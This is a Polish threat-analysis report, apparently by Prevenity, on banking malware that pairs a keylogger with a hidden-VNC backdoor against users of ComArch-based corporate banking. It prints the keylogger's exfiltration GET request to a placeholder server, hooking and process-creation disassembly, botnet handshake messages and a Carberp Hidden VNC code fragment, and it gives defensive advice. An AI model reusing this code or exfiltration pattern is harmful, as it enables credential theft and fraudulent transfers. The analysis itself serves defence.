Złośliwe oprogramowanie dla bankowości korporacyjnej
|
|
- Irena Cybulska
- 8 lat temu
- Przeglądów:
Transkrypt
1 Złośliwe oprogramowanie dla bankowości korporacyjnej Nowy atak na klientów bankowości korporacyjnej 10 Grudzień, 2013 Na przełomie września i października 2013 roku Zespół Prevenity zidentyfikował aktywność nowego złośliwego oprogramowania, które jest wykorzystywane w nowym scenariuszu kradzieży pieniędzy z kont klientów polskich banków. Tym razem atak skierowany jest na klientów korporacyjnych głównie małe i średnie przedsiębiorstwa korzystające z usług bankowości internetowej. Wstęp Scenariusz ataku jest bardzo prosty. Intruz instaluje keylogger oraz oprogramowanie do zestawiania połączenia za pomocą zdalnego pulpitu typu VNC. Keylogger rejestruje dane uwierzytelniające, autoryzujące transakcje oraz hasło do klucza, którym podpisywane są transakcje finansowe. W przypadku bankowości korporacyjnej zazwyczaj transakcje podpisywane są kluczem prywatnym, który przechowywany jest na zewnętrznym nośniku (np. karcie inteligentnej) lub w pliku na tym samym komputerze. Jeśli komputer jest włączony i z komputera nie została wyjęta karta inteligenta, intruz może w dowolnym momencie połączyć się z komputerem i wykonać przelew. Na dzień dzisiejszy złośliwe oprogramowanie nakierowane jest na aplikacje bankowości internetowej, które wykorzystują do uwierzytelniania i autoryzacji rozwiązania polskiej firmy ComArch S.A.. Poniżej przykład jednej z kilku wersji złośliwego oprogramowania podszywającego się pod aplikacje ComArch S.A.. Rysunek 1: Malware Prevenity
2 Złośliwa aplikacja rejestruje wprowadzane dane do formularzy przeglądarek internetowych oraz między innymi wywoływanych okien aplikacji, gdy wymagane jest podpisanie dyspozycji. Poniżej przykłady wywoływanych okien oraz fragment zarejestrowanej aktywności jednego z zainfekowanych użytkowników. Należy zaznaczyć, że zidentyfikowany malware ma możliwość podmiany danych transakcji (tzw. Man in the Browser). Jest to istotne, gdyż część implementacji oprócz podania hasła wymaga podania kodu SMS. Na chwilę obecną zanotowano jedynie ataki polegające na autoryzacji opartej wyłącznie o podpis kluczem. Jednakże nie można wykluczyć użycia w przyszłości i tej funkcji złośliwego oprogramowania. Rysunek 2: Oryginalne okna aplikacji do autoryzacji transakcji. [] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] H [H] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] a [Ha] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] s [Has] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] l [Hasl] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] o [Haslo] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] [e] [&Podpisz] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] [Lbut] Rysunek 3: Fragment zapisu malware. Zarejestrowane dane (w tym hasła) przesyłane są co określony interwał czasu do jednego z serwerów kontrolowanych przez intruzów. Każdy katalog to nazwa komputera i nazwa użytkownika. Poniżej fragment zawartości serwera oraz przykładowa zawartość katalogu. Każdy plik odpowiada uruchomionej aplikacji, z której przechwytywana była aktywność użytkownika (nie tylko wybrane klawisze klawiatury ale i kliknięcia myszą). Prevenity
3 Przykładowy katalog: Przykładowy katalog: Rysunek 4: Drop Zone oraz zawartość katalogów z danymi. Zidentyfikowany botnet działa od początku października. Dwie główne domeny.biz zarejestrowano 16 września 2013 roku, jednakże malware w pliku konfiguracyjnym ma wprowadzone inne domeny, które jeszcze nie są zarejestrowane również w domenie.biz. Każdego dnia pojawia się około 5-6 nowych zainfekowanych hostów z Polski. Malware uruchomiony na stacjach roboczych połączony jest co najmniej do dwóch sieci botnet. Oprócz dobrze znanego złośliwego oprogramowania typu ZeuS/Citadel zastosowany został nowy malware bazujący na kodzie Carberp. Intruzi w nowym malware wykorzystali między innymi bibliotekę Hidden VNC do zestawiania zdalnego pulpitu inicjowanego ze strony zainfekowanej stacji roboczej. Komunikacja jest szyfrowana. Nawiązywane jest połączenie z serwerem w domenie.biz na porcie 999/TCP. Poniżej przykład komunikacji przed i po zaszyfrowaniu. {"type":"handsnake","guid":"{d112baae-e BE45AAD315AADB87}","BuildId":"n","CompName":"LABPC","SystemVersion":"Windows 7 Home Premium Edition, 64-bit Service Pack 1 (build 7601); Polski (Polska)","ProcessorType":64,"ProcessorsCount":2,"ProcessorSpeed":1995,"BotVersio n": ,"memorysize":5814,"token":false,"timezone":"gmt+01:00","uptime":1584, "IdleTime":578,"HaveWebCam":true,"UserName":"Prevenity","Online":1} {"type":"send_me_update_please"} {"type":"cam_attached"} {"type":"cam_detached"} Rysunek 5: Fragment komunikacji botnet przed szyfrowaniem. Prevenity
4 Rysunek 5: Fragment komunikacji botnet po zaszyfrowaniu. Zalecenia dla firm Poniżej przedstawiamy ogólne zalecenia, które powinny zminimalizować ryzyko infekcji i kradzieży środków z konta firmowego. 1. Należy na bieżąco aktualizować system operacyjny oraz definicje systemu antywirusowego. 2. Należy wyjmować kartę inteligentną po wylogowaniu się z systemu bankowości internetowej. 3. Używać dedykowany komputer tylko i wyłącznie do celów łączenia się systemem bankowości internetowej. Jeśli to nie jest możliwe, nie instalować/uruchamiać oprogramowania, którego pochodzenia nie jesteśmy pewni. 4. Weryfikować historię autoryzowanych transakcji (szczególnie tych wykonywanych w paczkach). Szczegółowe informacje o złośliwym oprogramowaniu Zespół Prevenity zidentyfikował następujące komponenty złośliwego oprogramowania używane w atakach na klientów bankowości korporacyjnej. 1. Aplikacja typu keylogger 2. Aplikacja typu backdoor Keylogger Aplikacja keylogger składa się z dwóch elementów. Są to następujące pliki: Plik wykonywalny svcnost.exe Biblioteka Project2.dll Prevenity
5 Nazwa pliku Svcnost.exe Project2.dll MD5 6CD31B85902F2C1B B3 2D175618B6EB D2186C9B59 A0D380C9C401D35510B78CBDC9CB1B15 Plik svcnost.exe dodaje wpis do klucza rejestru RUN. Przy wywołaniu uruchamiany jest proces potomny z parametrami start+49 mov eax, offset adefault ; "default" start+4e mov ds:startupinfo.lpdesktop, eax start+53 push offset ProcessInformation ; lpprocessinformation start+58 push offset StartupInfo ; lpstartupinfo start+5d push 0 ; lpcurrentdirectory start+5f push 0 ; lpenvironment start+61 push 0 ; dwcreationflags start+63 push 0 ; binherithandles start+65 push 0 ; lpthreadattributes start+67 push 0 ; lpprocessattributes start+69 push offset CommandLine ; "svcnost.exe " start+6e push 0 ; lpapplicationname start+70 call CreateProcessA Następnie ładowana jest biblioteka Project2.dll i uruchamia z niej funkcja Hozzok(). Zidentyfikowaliśmy dwie wersje biblioteki Project2.dll. Pierwsza wersja rejestruje aktywność użytkownika do pliku tekstowego, druga przesyła zarejestrowane dane na zdalny serwer. W obu przypadkach keylogger-a użyta została funkcja SetWindowsHookEx do zainstalowania procedury przechwytywania zdarzeń. Funkcja SetWindowsHookEx eksportowana jest przez user32.dll. W tym przypadku keylogger przechwytuje zdarzenia z kolejki zdarzeń poszczególnych wątków (WH_GETMESSAGE). HHOOK WINAPI SetWindowsHookEx( Prevenity
6 _In_ int idhook, //typ procedury = 3 = WH_GETMESSAGE _In_ HOOKPROC lpfn, //procedura_logowanie _In_ HINSTANCE hmod, _In_ DWORD dwthreadid //0 ); Keylogger korzysta między innymi z funkcji GetWindowText do kopiowania nagłówka. Dla przykładu po wejściu na stronę główną kopiowany i zapisywany przez malware jest nagłówek Gazeta.pl Polska i świat wiadomości informacje wydarzenia Mozilla Firefox. Ułatwia to późniejszą identyfikację strony, której dotyczy zapisany login/hasło. W zarejestrowanej funkcji zaimplementowany jest filtr identyfikujący nazwy uruchamianych procesów. Keylogger zaczyna rejestrować aktywność użytkownika, gdy nazwy procesów zawierają poniższe ciągi znaków: Prevenity
7 Poniżej fragment kodu identyfikującego aplikacje firmy ComArch. Jak można zauważyć poniżej, przez malware rejestrowana jest też aktywność innych aplikacji niezwiązanych z korporacyjną bankowością internetową. Prevenity
8 Co kilka sekund budowane jest zapytanie i aktywność użytkownika przesyłana jest na zdalny serwer. Poniżej przykład takiego zapytania: GET URL/1.php?u=HOSTNAME_USERNAME&p=firefox.exe&a=LOGI HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MALC) Host: nazwa_hosta Connection: Keep-Alive Fragment kodu odpowiedzialny za budowę i wysyłanie zapytania GET. Poniżej fragment zawartości serwera budowa katalogu to nazwa zainfekowanego komputer i użytkownika na którego uprawnieniach działa malware. Prevenity
9 Backdoor VNC Druga aplikacja składa się z jednego pliku wykonywalnego. Plik zabezpieczony jest własnym pakerem i posiada zaimplementowanych kilka mechanizmów utrudniających analizę dynamiczną. Na zainfekowanym komputerze nazwa pliku wykonywalnego może przypominać nazwy programu systemowego (np. regedit.exe, waitfor.exe), MD5 analizowanego pliku: 3CC7EAD85080A667F3235F4E31BC5501. Opis pliku wskazuje na program z pakietu Sysinternals TCPView. Po zainstalowaniu złośliwe oprogramowanie tworzy katalog dllcache i kopiuje tam plik wykonywalny. Poniżej wszystkie punkty autostart dla analizowanego malware: C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\<nazwapliku>.lnk HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce HKCU\Control Panel\Desktop\Scrnsave.exe HKCU\Software\Microsoft\Command Processor\Autorun Prevenity
10 Gałąź HKCU jest używana w przypadku, gdy aplikacja nie jest uruchamiana z uprawnieniami administracyjnymi. Tworzony klucz to np. regedit z wskazaniem na plik regedit.exe w katalogu dllcache. Poniżej przykład: Większość zewnętrznych funkcji importowana jest dynamiczne. Poniżej kilka z nich, które będą używane do nawiązywania sesji VNC. Po uruchomieniu malware cześć kodu (dropper) ładowana jest do pamięci procesu explorer.exe. Kod ten monitoruje między innymi czy odpowiednie wpisy znajdują się w punktach autostart, wykrywa też obecność debuggera generując dużą ilość wątków dla monitorowanego procesu. Po uruchomieniu kod aplikacji sprawdza, czy w komputerze znajduje się karta inteligentna. Poniżej wykorzystywane funkcje API: SCardEstablishContext, SCardListReaders oraz SCardConnect. Dzięki temu intruz wie kiedy uzyskać dostęp do komputera w celu wykonania nieautoryzowanych transakcji. Prevenity
11 System zestawia szyfrowane połączenie VNC za pomocą komendy handsnake. Poniżej przykład komunikatu przed zaszyfrowaniem. {"type":"handsnake","guid":"{ D112BAAE-E BE45AAD315AADB87}","BuildId":"n","CompName":"LABPC","SystemVersion":"Windows 7 Home Premium Edition, 64-bit Service Pack 1 (build 7601); Polski (Polska)","ProcessorType":64,"ProcessorsCount":2,"ProcessorSpeed":1995,"BotVersio n": ,"memorysize":5814,"token":false,"timezone":"gmt+01:00","uptime":1584, "IdleTime":578,"HaveWebCam":true,"UserName":"Prevenity","Online":1} Funkcja zdalnego pulpitu bazuje na kodzie Hidden VNC, który dostępny jest w złośliwym oprogramowaniu Carberp (kod źródłowy wyciekł do Internetu na początku 2013 roku). Po uruchomieniu malware wywoływana jest funkcja VNCStartServer() a następnie NewClientAction(). Ta funkcja może uruchomić kamerę i/lub zdalny pulpit za pomocą funkcji API CreateDesktop(). rfbbool NewClientAction(rfbClientPtr cl) { PHVNC lpserver=(phvnc)cl->screen->screendata; cl->clientgonehook=clientgone; lpserver->eventsinfo.dwclients++; if (!cl->clientdata) cl->clientdata=memalloc(sizeof(hvnc_short_client_info)); HVNC_SHORT_CLIENT_INFO *lpclientinfo=(hvnc_short_client_info *)cl- >clientdata; lpclientinfo->dwlastkbdinputtime=lpclientinfo- >dwlastmouinputtime=gettickcount(); if (lpserver->deskinfo.bwebcam) #ifdef _HVNC_WEBCAM CamStartCapture(lpServer); #else ; #endif else if ((!lpserver->hdesktop) (!lpserver->dwexplorerspid) (!IsProcess(lpServer->dwExplorersPID))) { Prevenity
12 lpserver->hdesktop=createdesktopa(lpserver- >DeskInfo.szDeskName,NULL,NULL,DF_ALLOWOTHERACCOUNTHOOK,GENERIC_ALL,NULL); if (!lpserver->hdesktop) return FALSE; SetThreadDesktopEx(lpServer->hDesktop); lpserver->wndsinfo.hdeskwnd=getdesktopwindow(); Ciekawostki Jeden z naszych inżynierów w logach serwera znalazł zarejestrowaną aktywność intruza, który najprawdopodobniej testował złośliwe oprogramowanie i zapomniał je wyłączyć. Poniżej informacja o wybranych aktywnościach: Socks Admin //anonimowy dostęp przez systemy proxy oraz VPN Dostęp do paneli administracyjnych: o [Andromeda bot webpanel] o Zeus Control Panel o Exploit Kit [Neutrino - Mozilla Firefox] Sprawdzał jaki jest przelicznik EURO/PLN [Konverter Euro (EUR) og Polsk zlotych (PLN) : Valuta Exchange Rate Conversion Calculator - Mozilla Firefox] Próbki malware testuje na: [Scan4You.net - Online Anonymous Virus and Malware Scan - Mozilla Firefox] Oczywiście sprawdzał też, kto jest klientem firmy ComArch S.A. aby przeszukać następnie bazę botnet. [Comarch - global IT business solutions provider - Mozilla Firefox] [Lb][Lb] [Comarch Customers - Mozilla Firefox] [Lb][Lb][Lb][Lb][Lb] [CP :: Search in database - Mozilla Firefox] [Lb][Lb][ctrl]x[Lb] Prevenity
Analiza malware Remote Administration Tool (RAT) DarkComet BeSTi@
Analiza malware Remote Administration Tool (RAT) DarkComet BeSTi@ 24 marzec, 2014 Wstęp Tydzień temu do wielu skrzynek pocztowych w Polsce trafił email z linkiem do pliku podszywającego się pod nową aktualizację
Bardziej szczegółowoTrojan bankowy Emotet w wersji DGA
Trojan bankowy Emotet w wersji DGA Warszawa 17/11/2014 CERT Orange Polska Strona 1 z 7 Trojan bankowy Emotet został zauważony kilka miesięcy temu. Od tej pory zdaje się być cyklicznie wykorzystywany w
Bardziej szczegółowoZłośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY
Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY 4 sierpnia 2014 r. W dniach 1 do 4 sierpnia 2014 r. poddaliśmy analizie oprogramowanie
Bardziej szczegółowoFaktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA
Faktura Orange z 11 lipca 2014 roku zawierająca złośliwe oprogramowanie ANALIZA 21 Lipiec, 2014 W dniu 11 lipca 2014 zarejestrowaliśmy kolejną kampanię polegającą na rozsyłaniu złośliwego oprogramowania
Bardziej szczegółowoWarszawa, 22 marca 2011. Mariusz.Burdach@prevenity.com. Wstęp
Warszawa, 22 marca 2011 Mariusz.Burdach@prevenity.com Wstęp Pod koniec lutego 2011 roku klienci kilku polskich banków zostali zaatakowani nową wersją złośliwego oprogramowania Zeus (ZBOT) ZITMO (Zeus In
Bardziej szczegółowoUrządzenia mobilne Nowe szanse, nowe zagrożenia FWZQJAEHEPQABIRQS konkurs@prevenity.com
Urządzenia mobilne Nowe szanse, nowe zagrożenia Artur Maj, Prevenity FWZQJAEHEPQABIRQS konkurs@prevenity.com 1 Agenda Telefony komórkowe Rys historyczny Mobilne systemy operacyjne Bezpieczeństwo urządzeń
Bardziej szczegółowoAnaliza Malware Win32.KeyloggerSpy
Analiza Malware Win32.KeyloggerSpy CERT OPL Warszawa, 2014-09-23 CERT OPL Malware Analysis Strona 1 z 10 Testowana próbka została uzyskana z wiadomości SPAM, rozsyłanej losowo do polskich internautów.
Bardziej szczegółowoAgenda. Rys historyczny Mobilne systemy operacyjne
Mobilne zagrożenia Artur Maj, Prevenity Agenda Telefony komórkowe Rys historyczny Mobilne systemy operacyjne Bezpieczeństwo urządzeń smartphone Smartphone w bankowości Zagrożenia dla bankowości Demonstracja
Bardziej szczegółowoAnaliza możliwości złośliwego oprogramowania vjw0rm w kampanii phishingowej PayU
Warszawa, 16.03.2016 Analiza możliwości złośliwego oprogramowania vjw0rm w kampanii phishingowej PayU CERT OPL, Analiza vjw0rm; Autor: Iwo Graj Strona 1 z 14 W pierwszej połowie marca w polskim internecie
Bardziej szczegółowoZadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http.
T: Konfiguracja usługi HTTP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http. HTTP (ang. Hypertext Transfer Protocol) protokół transferu plików
Bardziej szczegółowoClient-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl
Client-side Hacking - wprowadzenie w tematykę ataków na klienta Radosław Wal radoslaw.wal@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagrożenia Client-side Minimalne
Bardziej szczegółowoAnaliza aktywności złośliwego oprogramowania Njw0rm
Warszawa, 17.05.2016 Analiza aktywności złośliwego oprogramowania Njw0rm CERT OPL, Analiza Njw0rm; Autor: Iwo Graj Strona 1 z 22 W ostatnich dniach CERT Orange Polska wykrył w sieci klienckiej Orange Polska
Bardziej szczegółowoAgenda. Urządzenia mobilne w transakcjach elektronicznych. - szanse i zagrożenia. Artur Maj, Prevenity. Przegląd rynku urządzeń mobilnych
Urządzenia mobilne w transakcjach elektronicznych - szanse i zagrożenia Artur Maj, Prevenity Agenda Przegląd rynku urządzeń mobilnych Urządzenia mobilne w transakcjach elektronicznych Bezpieczeństwo urządzeń
Bardziej szczegółowoBezpieczeństwo usług oraz informacje o certyfikatach
Bezpieczeństwo usług oraz informacje o certyfikatach Klienci banku powinni stosować się do poniższych zaleceń: nie przechowywać danych dotyczących swojego konta w jawnej postaci w miejscu, z którego mogą
Bardziej szczegółowoInstrukcja logowania do systemu e-bank EBS
Instrukcja logowania do systemu e-bank EBS 1. Instalacja programu JAVA Przed pierwszą rejestracją do systemu e-bank EBS na komputerze należy zainstalować program JAVA w wersji 6u7 lub nowszej. Można go
Bardziej szczegółowoUwaga!!! Autentykacja LDAP/AD zaimplementowana w Vigor wspiera tylko proste uwierzytelnianie (hasło przesyłane jest jawnym tekstem).
1. Konfiguracja serwera VPN 1.1. LDAP/AD 1.2. Ustawienia ogólne 1.3. Konto SSL 2. Konfiguracja klienta VPN 3. Status połączenia 3.1. Klient VPN 3.2. Serwer VPN Procedura konfiguracji została oparta na
Bardziej szczegółowoMazowiecki Elektroniczny Wniosek Aplikacyjny
Mazowiecki Elektroniczny Wniosek Aplikacyjny Generator Offline Instrukcja użytkownika Problemy z aplikacją można zgłaszad pod adresem: zgloszenie@mazowia.eu SPIS TREŚCI Zawartość 1 Instalacja Generatora
Bardziej szczegółowoInstrukcja konfiguracji i uruchamiania połączenia VPN z systemami SAP
Temat Połączenie z systemami SAP z wykorzystaniem połączenia VPN spoza sieci Uczelni Moduł: BASIS Wersja: 0.12 Data: 2009-05-05 Wersja. Data Wprowadzone zmiany Autor zmian 0.1 2007-12-03 Utworzenie dokumentu
Bardziej szczegółowoOrange Polska S.A. Bezpieczeństwo Systemów Teleinformatycznych / Wydział Operacji Bezpieczeństwa
Warszawa, dnia 05.02.2016 Analiza kampanii złośliwego Oprogramowania E-Faktura Orange Win32.PWSZbot.fc CERT OPL analiza malware; autor: Iwo Graj Strona 1 z 7 1. Wstęp Znaczna liczba polskich internautów
Bardziej szczegółowoInstrukcja użytkownika
Instrukcja użytkownika Menadżer Licencji Wersja 2013.0.1 Spis treści 1 WPROWADZENIE... 3 2 AKTUALIZACJA SERWISU KLUCZA HASP ORAZ ZDALNEGO SERWISU KLUCZA... 3 3 INSTALACJA... 3 4 MONITOR MENADŻERA LICENCJI...
Bardziej szczegółowoForte Zarządzanie Produkcją Instalacja i konfiguracja. Wersja B
Forte Zarządzanie Produkcją Instalacja i konfiguracja Wersja 2013.1.B Forte Zarządzanie Produkcją - Instalacja i konfiguracja Strona 2 z 13 SPIS TREŚCI 1 Instalacja i konfiguracja Forte Zarządzanie Produkcją...
Bardziej szczegółowoNecurs analiza malware (1)
Necurs analiza malware (1) CERT OPL, Analiza Necurs; Autor: Tomasz Sałaciński Strona 1 z 9 W trakcie analizy powłamaniowej w systemie jednego z klientów Orange Polska uzyskano nową próbkę złośliwego oprogramowania.
Bardziej szczegółowoInstrukcja obsługi serwera FTP v.28.12.2010
Instrukcja obsługi serwera FTP v.28.12.2010 1. Dostęp klienta do konta FTP 1.1. Wprowadzić do przeglądarki adres ftp://87.204.185.42 lub alternatywny adres IP ftp://82.11.1160.114 1.2. Wprowadzić nazwę
Bardziej szczegółowoPomoc dla usługi GMSTHostService. GMSTHostService. Pomoc do programu 1/14
GMSTHostService Pomoc do programu 1/14 Spis treści 1.Rejestracja...3 1.1.Pierwsza rejestracja...3 1.2.Ponowna rejestracja produktu...8 2.Podstawowe informacje o GMSTHostService...8 3.Przykładowa konfiguracja
Bardziej szczegółowoBotnet Hamweq - analiza
Botnet Hamweq - analiza CERT Polska / NASK 3 czerwca 2011 Oznaczenia Botmaster - osoba sprawująca kontrolę nad botnetem poprzez serwer CC. Zombie Botnet - zainfekowany komputer pod kontrolą botmastera.
Bardziej szczegółowoBezpieczeństwo aplikacji typu software token. Mariusz Burdach, Prevenity. Agenda
Bezpieczeństwo aplikacji typu software token Mariusz Burdach, Prevenity Agenda 1. Bezpieczeństwo bankowości internetowej w Polsce 2. Główne funkcje aplikacji typu software token 3. Na co zwrócić uwagę
Bardziej szczegółowoInstrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH.
Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Spis treści 1. Konfiguracja poczty Exchange dla klienta pocztowego Outlook 2007 protokół Exchange
Bardziej szczegółowoInstrukcja instalacji nośników USB w systemie internetowym Alior Banku
Instrukcja instalacji nośników USB w systemie internetowym Alior Banku Nośnik USB służy do przechowywania klucza elektronicznego, używanego do logowania i autoryzacji transakcji. Opcja dostępna jest wyłącznie
Bardziej szczegółowoOCHRONA PRZED RANSOMWARE
OCHRONA PRZED RANSOMWARE Konfiguracja ustawień Wprowadzanie zmian i proponowanych w niniejszym dokumencie polityk bezpieczeństwa polecamy wyłącznie administratorom, posiadającym szczegółową wiedzę nt swojej
Bardziej szczegółowoDostęp bezprzewodowy do Uczelnianej Sieci Komputerowej Politechniki Poznańskiej Instrukcja dla studentów Politechniki Poznańskiej
POLITECHNIKA POZNAŃSKA Dzial Sieci Teleinformatycznych Dostęp bezprzewodowy do Uczelnianej Sieci Komputerowej Politechniki Poznańskiej Dostęp bezprzewodowy do Uczelnianej Sieci Komputerowej Politechniki
Bardziej szczegółowoPomoc dla http://host.nask.pl/ 31.12.2012 r.
Pomoc dla http://host.nask.pl/ 31.12.2012 r. Spis treści Kontakt... 2 Logowanie do konta pocztowego przez WWW... 3 Logowanie do panelu administracyjnego... 4 Konfiguracja klienta pocztowego... 7 Umieszczanie
Bardziej szczegółowoOCHRONA PRZED RANSOMWARE. Konfiguracja ustawień
OCHRONA PRZED RANSOMWARE Konfiguracja ustawień SPIS TREŚCI: Wstęp...................... 3 Dlaczego warto korzystać z dodatkowych ustawień...... 3 Konfiguracja ustawień programów ESET dla biznesu......
Bardziej szczegółowoH-Worm RAT. Analiza aktywności złośliwego oprogramowania. CERT Orange Polska S.A. Warszawa, dnia
Warszawa, dnia 16.02.2016 Analiza aktywności złośliwego oprogramowania H-Worm RAT CERT Orange Polska Analiza Malware H-Worm; Autor: Iwo Graj Strona 1 z 17 W ostatnich dniach CERT Orange Polska wykrył w
Bardziej szczegółowoAsix Konfiguracja systemu Asix dla usługi Pulpitu zdalnego Remote Desktop Services, (Terminal Services)
NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI Asix Konfiguracja systemu Asix dla usługi Pulpitu zdalnego Remote Desktop Services, (Terminal Services) Pomoc techniczna (dla Asix od wersji 7 i systemu Windows
Bardziej szczegółowoInstrukcja generowania certyfikatu PFRON i podpisywania dokumentów aplikacji SODiR w technologii JS/PKCS 12
Instrukcja generowania certyfikatu PFRON i podpisywania dokumentów aplikacji SODiR w technologii JS/PKCS 12 Wersja 3.0 02-03-2017 Spis treści Instrukcja generowania certyfikatu PFRON i podpisywania dokumentów
Bardziej szczegółowoInstrukcja instalacji czytnika kart mikroprocesorowych i konfiguracji przeglądarki internetowej do współpracy z systemem bankowości elektronicznej CIB
Instrukcja instalacji czytnika kart mikroprocesorowych i konfiguracji przeglądarki internetowej do współpracy z systemem bankowości elektronicznej CIB Spis treści: 1. Instalacja niezbędnych komponentów...
Bardziej szczegółowoCertyfikat Certum Basic ID. Instrukcja dla użytkowników Windows Vista. wersja 1.3 UNIZETO TECHNOLOGIES SA
Certyfikat Certum Basic ID Instrukcja dla użytkowników Windows Vista wersja 1.3 Spis treści 1. INSTALACJA CERTYFIKATU... 3 1.1. KLUCZ ZAPISANY BEZPOŚREDNIO DO PRZEGLĄDARKI (NA TYM KOMPUTERZE),... 3 1.2.
Bardziej szczegółowoInstrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID
Instrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID wersja 1.3 Spis treści 1. INSTALACJA CERTYFIKATU... 3 1.1. KLUCZ ZAPISANY BEZPOŚREDNIO DO PRZEGLĄDARKI (NA TYM KOMPUTERZE),... 3 1.2.
Bardziej szczegółowoBiuletyn techniczny. CDN OPT!MA 12.0 Drukarki fiskalne w usługach terminalowych. Copyright 2007 COMARCH SA
Biuletyn techniczny CDN OPT!MA 12.0 Drukarki fiskalne w usługach terminalowych Copyright 2007 COMARCH SA 1 Spis treści 1 SPIS TREŚCI... 2 2 DRUKARKI FISKALNE W USŁUGACH TERMINALOWYCH... 3 2.1 2.2 INSTALACJA
Bardziej szczegółowoZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ
ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ WYMAGANIA BEZPIECZEŃSTWA DLA SYSTEMÓW IT Wyciąg z Polityki Bezpieczeństwa Informacji dotyczący wymagań dla systemów informatycznych. 1 Załącznik Nr 3 do Część II SIWZ Wymagania
Bardziej szczegółowoAnaliza malware Keylogger ispy
Analiza malware Keylogger ispy Instalacja złośliwego oprogramowania W październiku na skrzynkę funkcyjną CERT Orange Polska otrzymaliśmy przysłany przez użytkownika mail z podejrzanym załącznikiem. Jeśli
Bardziej szczegółowoOprogramowanie OpenVPN jest oprogramowaniem darmowym, które można pobrać ze strony:
Aby móc korzystać z bazy publikacji elektronicznych należy: 1) posiadać konto w usłudze LDAP (konto logowania do Internetu), 2) zainstalować i skonfigurować oprogramowanie OpenVPN na swoim komputerze,
Bardziej szczegółowoFAQ Systemu EKOS. 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen?
27.06.11 FAQ Systemu EKOS 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen? Procedura rejestracji ocen wymaga podpisywania protokołów (w postaci wypełnionych formularzy InfoPath Forms
Bardziej szczegółowoProtokół HTTP (2) I) Wprowadzenie. II) Użyte narzędzia: III) Kolejność działań
Protokół HTTP (2) I) Wprowadzenie Celem ćwiczenia jest zapoznanie z protokołem HTTP. Ćwiczenie obejmuje takie zagadnienia jak: a) instalację i konfigurację serwera HTTP (Apache2), b) uwierzytelnianie dostępu
Bardziej szczegółowoRaport z analizy porównawczej rodzin ransomware JAFF i Cry
Warszawa, 17.07.2017 Raport z analizy porównawczej rodzin ransomware JAFF i Cry CERT OPL, Analiza JAFF; Autor: Tomasz Sałaciński Strona 1 z 6 Próbka Analizowana próbka to moduł PE32 o następujących skrótach
Bardziej szczegółowoInstrukcja instalacji nos niko w USB w bankowos ci Alior Banku
Instrukcja instalacji nos niko w USB w bankowos ci Alior Banku Nośnik USB służy do przechowywania klucza elektronicznego, używanego do logowania i autoryzacji transakcji. Opcja dostępna jest wyłącznie
Bardziej szczegółowoWykorzystanie pamięci USB jako serwera Samba
1. Ustawienia komputera 2. Podłączenie dysku USB 3. Ustawienia routera Vigor 3.1. Ustawienia ogólne 3.1. Konta użytkowników 4. Połączenie z serwerem plików 4.1. Odnajdywanie serwera plików 4.1.1. \\lokalny_adres_ip_routera
Bardziej szczegółowoInstrukcja użytkownika
Instrukcja użytkownika Menadżer Licencji Wersja 2013.2.1 Spis treści 1 WPROWADZENIE... 3 2 AKTUALIZACJA SERWISU KLUCZA HASP ORAZ ZDALNEGO SERWISU KLUCZA... 3 3 INSTALACJA... 3 4 MONITOR MENADŻERA LICENCJI...
Bardziej szczegółowoZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ
ZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ WYMAGANIA BEZPIECZEŃSTWA DLA SYSTEMÓW IT Wyciąg z Polityki Bezpieczeństwa Informacji dotyczący wymagań dla systemów informatycznych. 1 Załącznik Nr 1 do Część II SIWZ SPIS
Bardziej szczegółowoInstrukcja do programu Roger Licensing Server v1.0.0 Rev. A
Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A Spis treści Spis treści... 2 Wprowadzenie... 3 Przeznaczenie... 3 Moduły... 3 Koncepcja działania... 3 Wymagania... 4 Instalacja... 5 Używanie
Bardziej szczegółowoZasady bezpiecznego korzystania z bankowości elektronicznej
Zasady bezpiecznego korzystania z bankowości elektronicznej 1. Zawsze sprawdzaj na stronie logowania bankowości elektronicznej aktualne zasady bezpiecznego korzystania z bankowości elektronicznej. 2. Szczegółowe
Bardziej szczegółowoPOLITECHNIKA POZNAŃSKA
POLITECHNIKA POZNAŃSKA CENTRUM ZARZĄDZANIA SIECIĄ KOMPUTEROWĄ Dostęp bezprzewodowy do Uczelnianej Sieci Komputerowej Politechniki Poznańskiej Instrukcja dla studentów Politechniki Poznańskiej wersja 2008081401
Bardziej szczegółowoe-audytor v.3.x INSTRUKCJA INSTALACJI I URUCHOMIENIA SYSTEMU
